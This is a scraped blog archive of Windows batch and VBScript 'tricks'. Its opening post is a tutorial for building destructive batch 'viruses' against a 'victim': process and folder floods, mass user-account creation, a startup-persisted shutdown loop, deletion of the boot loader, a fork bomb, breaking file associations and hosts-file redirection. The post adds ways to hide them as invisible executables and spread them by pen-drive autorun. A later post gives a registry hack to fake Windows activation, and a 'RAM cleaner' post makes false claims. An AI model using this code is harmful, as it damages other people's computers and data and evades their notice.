WHAT'S NEW?
Loading...
Showing posts with label programing. Show all posts
Showing posts with label programing. Show all posts

Understanding Batch Files ?


A batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run. 

Batch viruses dangerous ?

Yes, They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Simple codes, Just copy the code to notepad and save it as filename.bat
make sue extension must be bat and save it as 'all files' instead of text files.

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1.  Application Bomber


@echo off // It instructs to hide the commands when batch files is executed
:x   //loop variable
start winword
start mspaint  //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance. 

2. Folder flooder
@echo off
:x
md %random% // makes directory/folder. 
goto x

Here %random% is a variable that would generate a positive no. randomly.  So this code would make start creating folders whose name can be any random number. 

3.User account flooder 
@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers. 

3.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”  
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”    //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00  //this will shutdown the computer in 0 seconds  


Note : Files in Start up folder gets started automatically when windows starts .  You should  first two lines of  code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder. 

4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply 

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.

 Lets make a batch file to 
delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr   // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr    //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again. 


5. Fork Bomb

%0|%0  //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows.
                 
6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything                          


Every extension is associated with a filetype like extension ‘exe’ is  is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.


7.  DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts  file.
@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts   //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file. 

Replace xxx.xxx.xxx.xxx  and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.

                                              Viruses we just coded




Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.
   
Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.
Download this Batch To Exe coverter from here

After running converter ,  open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.  
                     
You can  use other options as per your requirement. 

Spreading batch viruses through pen drive -:

Step 1. 
Open notepad and write 
[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Chat in MS-DOS using IP address


It is easy and simple trick.  We can chat using MS-DOS(we have did this as college experiment in network lab with java code).  But i am not going to give you the java code.  Our usual Batch Programming.

You can try this in your school or college systems(it should be networked systems).

Step 1: 
 Get  the ip address of your friend's system.
if you are using college or school system,then ip address will be in particular range.



Step 2:copy the following Batch code in notepad:
@echo off
:A
Cls
echo TypeIPAddress
set /p n=IPAddress:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Save the file with .bat extension(For Eg: message.bat)
Step 3:Open command prompt and navigate to that batch file location.
open the file in notepad.
If you don't know how to move to that path,simply drog and drop in cmd.Then hit enter.
Step 4:Now it will ask you for the IPAddress.
Enter the IP address which you want to send message.
Hit enter
Now it will ask you for the message.
Enter and hit enter
Note:The user with whom you connecting system's cmd should be opened in order to receive. 
Step 5:What is next? Comment Here! If the above method not working for you. Then comment what you did and What it showing. Or is it working perfectly ?then share your experience with us

Updated trick for enabling Folder option

 
Many times Windows users face a common problem. The “Folder Options” in “Tools” menu is not visible. Even It can’t be accessed from Control Panel. Also “Registry Editor” is disabled.
Follow the simple steps mentioned in this tutorial and your problem will be solved:

1. If Folder Options is disabled but Registry Editor is still working in your system, then you can enable Folder Options by editing Windows Registry.
Type regedit in RUN dialog box and press Enter.
it’ll open Registry Editor, now go to following keys:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\ExplorerHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Policies\Explorer
In right-side pane, check whether a DWORD value named NoFolderOptions exists or not? If it exists, delete it.

2. If you are not familiar with editing the registry, then you can simply download following file, extract it and then run the .REG file:
Folder_option.zip

................................................................................................................
If u cant run regedit ....
Seems like your system is infected with a virus. Pls follow following link:
http://www.askvg.com/is-your-system-infected-with-a-virus-spyware-adware-trojan/

..................................................................................................................
Some ppl find that "show hidden files and folders" option ll not b enabled..
though enabled they cant c the hidden folders...
for that dont worry
--open RUN
--type regedit
--HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Explorer\Advanced
And in right-side pane, change value of “Hidden” to 1 and refresh My Computer window and you’ll be able to see hidden files again
  

Protecting your pendrive without using anti virus

 



Many of our PC gets infected because of pendrives or USB devices,

You can protect your PC by just following the simple steps below.

*Connect your Pen Drive or USB drive to your computer.
*Now a dialogue window will popup asking you to choose among the options like
Open folder to view files, View the slideshow of images etc ,etc.

Don't choose any of them , Just simply click Cancel.

*Now go to Start--> Run and type "cmd" to open the Command Prompt window .

*Now go to My Computer and Check the Drive letter of your USB drive or Pen Drive . Drive letter will be letter next to Removal Disk name or your pen drive name.

*In the Command Window ( cmd ) , type the drive letter and Hit Enter

*Now type dir/w/o/a/p and Hit Enter

*You will get a list of files .
In the list , search if anyone of the following do exist,

1. Autorun.inf

2. New Folder.exe

3. Bha.vbs

4. Iexplore.vbs

5. Info.exe

6. New_Folder.exe

7. Ravmon.exe

8. RVHost.exe

9. Diskknight.exe or any other files with .exe Extension .

If you find any one of the files above , Run the command "attrib -h -r -s -a *.*" and Hit Enter.

Now Delete each File using the following Command del filename ( E.g "del autorun.inf" ) .

Thats almost it

Hi Viewers, Today I will be showing you to create clock with notepad its simple and takes just a couple of lines of code , Actually this Trick Allows You To Get System Time Using Windows Command Line (CMD ) & We will be Making an Calculator too !

For Clock:-



Step 1:- Copy and paste this code into notepad

@echo off
title DOS-Based Clock
color 0a
cls
: CLOCK
cls
echo The current time is: %time%
goto CLOCK (91)

how to create clock with notepadStep 2:-  Save File as "Clock.bat" (with quotes)

      For Calculator:-


Step 1:-  Copy and paste this code into notepad

@echo off
title Batch Calculator by Techies
color 0c
:top
echo ————————————–
echo -Welcome to Batch Calculator by Techies Blogspot !-
echo ————————————–
echo Enter your Calculations
echo.
set /p sum=
set /a ans=%sum%
echo.
echo = %ans%
echo ————————————————————–
pause
cls
echo Previous Answer: %ans%
goto top
pause
exit

Step 2:-  Save as "Calc.bat" (with quotes)

how to create calculator with notepad

                                                                                                                         

Shutdown Your Computer or a Remote PC via Command Prompt

Most of us shutdown our computers using the power button given in the Start menu. Some of us use the physical power button on our machines. Very few people actually use other means of shutting down a computer and even less is the number of people who use the command prompt to shutdown a computer.

A reason for this is that most of us don't know that the command prompt can be used to not only shutdown, restart or log off our computer instantly but also to shutdown a remote computer provided you have administrative access. It can also be used to hibernate a computer and give a comment containing the reason for shutdown. This post will show you how to do all this.

Shutdown computer with command prompt
Required
A computer running Windows (XP, Vista, 7, 8 or 8.1) with the command prompt working perfectly, i.e. not disabled by a virus.

Initial Steps
1) Press Windows Key + R.
2) Enter CMD and press Enter.

This will start the command prompt. Follow the instructions below depending on what you want to do.

Shutdown Local Machine (Your Computer)
Type "shutdown -s" without the quotes in the command prompt and press Enter. Shutdown is the command being executed and the switch -s tells the computer to shutdown.

Restart your Local Computer
Type "shutdown -r" in the command prompt and press Enter. In this case, the command switch -r is telling the computer to restart after shutdown.

Log Off the Current User
Type "shutdown -l" in the command prompt and press Enter. The -l command switch tells the computer to log off.

Shutdown a Remote Computer
Type "shutdown -s -m \\name of the computer" in the command prompt and press Enter. Replace \\name of the computer with the actual name of the remote computer you are trying to shutdown. As mentioned earlier, you must have administrative access to the computer you are trying to shutdown. To know if you have administrative access, press Windows key + R and then type the name of the computer and press Enter.

Note: If you don't remember the name of the remote computer, you can look for it by opening a list of all the computers you are connected to by executing "net view" in command prompt.

If you can connect to the computer, you will be asked to login with your username and password. Upon entering them, a window will display the list of all the directories available to you. This should help you know whether you can or cannot shutdown the remote computer.

Hibernate a Local Computer
Type in "Rundll32.exe Powrprof.dll,SetSuspendState" without the quotes and press Enter. Your computer should hibernate, if it does not, then you must enable hibernation to do this.

Shutdown your or a remote computer after a specific time
Type "shutdown -s -t 60" to shutdown your computer after 60 seconds. Upon executing this, a countdown timer displaying a warning message will be shown. This command uses the -t command switch followed by a variable (which is 60 in this case) which represents the number of seconds after which the computer will shutdown.

Display a Message containing the reason for shutdown
Type shutdown -s  -t 500 -c "I am tired. I don't want to work anymore." (with the quotes) in the Command Prompt and press Enter. The -c switch is used in the code to give the reason for shutting down and what is followed in quotes will be displayed in the dialog box as the reason. This can be used to display all sorts of funny messages. One example :-

Skynet has become self aware. John Connor did not stop me. You can not use your PC anymore.

Stop a System Shutdown
Type "shutdown -a" and press Enter. This will stop the system from shutting down if the countdown to shut down has not reached 0.

Change Processor Name Permanently

A while ago on Tweak And Trick, I published an article on changing your processor name. But recently, Anil Kumar pointed out that the trick only changed the name temporarily.

After a user restarts his computer, the name reverted back to original which is obvious as each time Windows boots, it checks the connected hardware and updates the registry value automatically. So, changing the processor name using the earlier article did not have permanent results.

Thus, the alien processor name you had earlier again reverted back to the boring old one.

Change Processor Name Permanently

Problem: To, make the name change permanent, it was required to update the Processor Name String registry key every time Windows starts.

Solution: It is very easy to change your processor name permanently by creating a registry key and placing a shortcut to it in the Windows start up folder. To do so, just follow the steps given below:-


Steps :-
1.  Open Notepad.
2.  Copy and paste the exact code given below:-

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]
"ProcessorNameString"="My Processor name 50000MHz"
To change the processor name, edit the part of the code given in blue. Also understand that \0 in the above code should only be present if Windows store your processor name at that location. Open the Registry Editor and navigate to the above mentioned keys to check whether or not to include the \0.

3.  Click on File Menu, click on Save As and select "All Types" in the Save as Type option. Save the file as ProcessorNameChange.reg or *.reg.
4.  Create a new shortcut on your desktop. Enter regedit / S "Location of the .reg file" as the location of the item. For example, enter regedit /S "C:\Processor Name.reg" if your registry file is located in the root of C:\ drive.

Processor Name

5. Copy the created Shortcut file.
6.  Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) or to C:\Users\ User-Name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista. Also remember that AppData is a hidden folder.)  if C: is your System drive.
7.  Paste the copied file.


This registry file would now execute each time when Windows starts and the Processor Name String would be modified each time. This means that even upon restarting your computer, you will see that the changed processor name is permanent.

How to search a file in your PC by using CMD, notepad


Hello friends, Here I'm with a new trick How to show your desired-named file in your PC by your CMD. by using notepad. The file you search will be resulted with in 10 seconds.



Just copy and paste the following code in notepad and save it as anything.bat. Remember, save the file with extension ".bat". Or just download the file from here.

set shell = CreateObject("WScript.Shell") fileNam=Inputbox("Enter part of the file name you want to search","File Name") If(fileNam <> "") then dirName=Inputbox("In which drive you want to search ?"+vbcrlf+"Example: If you want to search in D drive then enter only D","Drive name") msgbox "Searching the entire drive may take some seconds. Press OK continue.",,"Message" Shell.run "Cmd.exe" WScript.Sleep 3000 Shell.sendkeys "dir "+dirName+":\ /s /b | find "+Chr(34) + fileNam + Chr(34)+"{ENTER}" End If

Now just open the file. It will promt you to enter the drive letter where you want to search.
Now enter the drive letter and the string you want to search named with.

Now the files along with the path will be displayed in your command promt with in 10 seconds.

NOTE : To convert these bat files to exe, use this .bat to .exe converter tool

Create a Harmless Funny Virus with Notepad-Continuously eject CD/DVD drives

Copy this code and paste it in Notepad and save as Virus.vbs or *.vbs

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Double click to open this file and you will be impressed by this awesome trick.

How to Stop the virus process:

Open task manager or press Ctrl+Alt+Del

Click Process tab.

Select wscript.exe.

End process

Make ur computer speak what ever you type



Make your computer speak whatever you type

1] open notepad

And

2] copy and paste the following code in it and save it as speak.vbs and open it...

Code is:




Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message

Hack To Set wallpaper In Pen Drive


Hack To Set wallpaper In Pen Drive



Are you bored of viewing the same white background in your USB pen drive, here is a trick where you can easily set colorful wallpapers on your USB background.

For that you need the following code:-

[{BE098140-A513-11D0-A3A4-00C04FD706EC}] IconArea_Image=abc.bmp IconArea_Text=0×00000000

Copy and paste it in a notepad file, and specify the image file name (here it is abc.bmp), then save it in your memory stick or pendrive as desktop.ini also you are supposed to keep the image file on the memory stick or your pendrive.
Refresh and view the background. Now every time when you open your pendrive it will show background wallpaper

Clean you RAM using your Notepad



Many ask where can I download a software which can keep my RAM free?

And I found these software are nothing but using some lines of code which can be implemented by using

notepad or any editor tool. So if any one does not have any software, you can use it by doing the

following things which I am going to mention






Step 1: Open Notepad

Step 2: Type FreeMem=Space(10240000000)



Step 3: Save it as “CLEANER.VBS” in any location you like.

Step 4: You can edit the code and write 512 instead of 1024 if you own a 512mb RAM or 2048 if you have 2gb ram or 4096 if you have 4bg ram or change to anything you like.

Step 5: Run it !




After this final step your RAM will be free.




Hope you enjoyed it.

Make ur Windows Genuine using notepad!!!!

                                                             
1. Open up Notepad.

2. Copy the following code and paste it in notepad.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Mi crosoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b ,6a,8d,6f,d5,33, 93,f d
"LastWPAEventLogged"=hex:d5,07 ,05,00,06,00,07, 00,0 f,00,38,00,24,00,fd,02
[HKEY_LOCAL_MACHINE\SOFTWARE\Mi crosoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"InstallDate"=dword:427cdd 95
"ProductId"="69831-640-1780577-45389"
"DigitalProductId"=hex:a4,00,0 0,00,03,00,00,00 ,36, 39,38,33,31,2d,36,34,30,2d,\
31,37,38,30,35,37,37,2d,34,35, 33,38,39,00,5a,00,00 ,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,00, 0d,04,89,b2,15,1b,c4 ,ee,62,4f,e6,64,6f,01,00,\
00,00,00,00,27,ed,85,43,a2,20, 01,00,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00, 00,31,34,35,30,34,00 ,00,00,00,00,00,00,ce,0e,\
00,00,12,42,15,a0,00,08,00,00, 87,01,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00, 00,00,00,00,00,00,00 ,94,a2,b3,ac
"LicenseInfo"=hex:9e,bf,09,d0, 3a,76,a5,27,bb,f 2,da ,88,58,ce,58,e9,05,6b,0b,82,\
c3,74,ab,42,0d,fb,ee,c3,ea,57, d0,9d,67,a5,3d,6e,42 ,0d,60,c0,1a,70,24,46,16,\
0a,0a,ce,0d,b8,27,4a,46,53,f3, 17

3. Then save it in .reg extension. For example, save it as License.reg

4. Double click the saved file and click Yes if prompted.

5. DONE!

Make your PC speak at startup


How it will be when you log on to your computer and when your PC wishes you or greets or just say anything? People think like you are using an intelligent PC.
When I log on, my PC greets me every time. Like it says me "Welcome back Sriram"

Now just open notepad, copy and paste the following code:

Dim speaks, speech
speaks="Welcome Back"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks

You can change the Welcome Back to any words you wanna your PC to say.
And save it as anything.vbs. ie, with any name but with .vbs extension.

And save it in the start-up folder.
You can find your start-up folder using below path.

In Windows XP 

C:\Documents and Settings\All Users\Start Menu\Programs\Startup

In Windows Vista, 7 and 8 

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Now, each time you log on, you will be hear your welcome word.

How to Create your own FOLDER LOCK using notepad


Hello friends, in this post I am going to give you a trick how to lock a folder of your desired password and hide it.

All you need is just copy and paste the following code in the notepad and save it as anything.bat like lock.bat or you can give it any name.



cls
@ECHO OFF
title www.mypcutility.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== mypcutility goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End

And save it in any place you want. The default password for this is mypcutility. Now find the word and change it to anything to you desire.

Now Double-click on the bat file, this now will create a folder named MyFolder and copy the files into the folder.

Now Double-click on the bat file, this is now ask you whether you want to lock the file. To lock press y and hit enter. If not n. If given y, then it will lock and hide the folder.

And if you want to open folder, then double-click the bat file and it will ask you to enter the password. Now enter the password and that will show the folder. Now get access the files in the folder.

That's all, hope its beneficial.

And if you dont want user to modify your password or view it, then just convert the batch file to exe using  .bat to .exe converter tool

How to watch Live Cricket match any where (using embed code)


Are you a great fan for cricket? Wanna see live cricket when ever there is a match scheduled on a time? All you need is, a text editor and internet
  1. Copy any one of the following codes in notepad and save it with .html extension.
  2. Save the html file anywhere.
  3. Now, whenever you want to watch the (live) crick match, then just open the file and u can watch it.

Hope you enjoy

Note: If you have a descent net speed. then you can watch.

Code 1
<iframe src="http://www.cricvip.com/" width="600" height="480" id="myfr" scrolling="no" frameborder="0" marginheight="0" marginwidth="0">Your Browser Do not Support Iframe</iframe>
Code 2
<iframe src="http://cricpower.com/link1.php" width="600" height="420" id="myfr" scrolling="no" frameborder="0" marginheight="0" marginwidth="0">Your Browser Do not Support Iframe</iframe>
Code 3 for Ten Cricket
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=600 HEIGHT=420 SRC="http://www.streamer247.com/tencricket.php"></IFRAME> 
Code 4
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=600 HEIGHT=420 SRC="http://www.streamer247.com/hd.php"></IFRAME>

Code 5 for Star Cricket
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=600 HEIGHT=450 SRC="http://www.embedstream.com/starcricket.php"></IFRAME>

How it looks like when you save it  (Click here)

All we are doing is, we are embedding the code and streaming it.

How to remove write protection from USB pendrive


Hello friends. Today I'm going to teach you a old trick but very useful for those who are newbie to use PC and pen drives.
How to remove write protection from USB prendrive

Write-protection makes a device suitable for repairing virus-contaminated host computers without risk of infecting the USB flash drive itself. But at the same time, you can not use your pen drive after making it write protected by some one. You cannot copy files into the drive. You cannot do anything with it.



Here is the simple trick how to remove write protection from your USB pen drive:

Press Ctrl+r and type regedit.

Now navigate to the following registry in the registry editor



Now select storagedevicepolicies and now that will open a right pane.

In that pane right click on the write protect. Now change the value data from 1 to 0.
Now navigate to the following registry 


Now this will remove the write protection. And format the pen drive in FAT32 format.

Now restart your PC. And you can use the pen drive.

Check out the video for better understanding